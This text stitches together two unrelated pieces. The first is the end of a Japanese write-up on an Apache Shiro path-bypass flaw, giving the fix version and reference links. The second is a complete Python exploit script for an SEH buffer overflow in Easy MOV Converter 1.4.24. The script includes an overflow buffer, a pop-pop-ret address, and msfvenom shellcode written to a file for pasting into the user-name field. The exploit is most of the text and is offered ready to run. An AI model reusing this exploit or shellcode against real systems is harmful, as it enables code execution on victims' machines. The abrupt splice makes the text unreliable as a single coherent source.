uri=getSanitizedPath(uri);
uriを返します。
}
0x06脆弱性修正
現在、公式の脆弱性の修正バージョンがリリースされ、更新されたApache Shiro=1.6.0
0x07参照
https://github.com/lyy289065406/cve-2020-139333https://www.cnblogs.com/ph4nt0mer/p/135359999.htmlhttps://xz.aliyun.com/t/8223
#!/usr/bin/python
###############################################################################
# Exploit Title: Easy MOV Converter 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 13-06-2017
# Exploit Author: @abatchy17 -- www.abatchy.com
# Vulnerable Software: Easy MOV Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.4.24
# Software Link: http://www.divxtodvd.net/easy_mov_converter.exe
# Tested On: Windows 7 SP1 32bit
#
# Special thanks to @t_tot3s for pointing out how stupid I am. Credit to Muhann4d for discovering the PoC (41911).
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of exploit.txt
#
##############################################################################
# If you're using WinXP SP3, change this to 996
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x1001145c : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files\Easy MOV Converter\SkinMagic.dll)
SEH = "\x5c\x14\x01\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
junk = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + junk + buf
f = open ("exploit.txt", "w")
f.write(data)
f.close()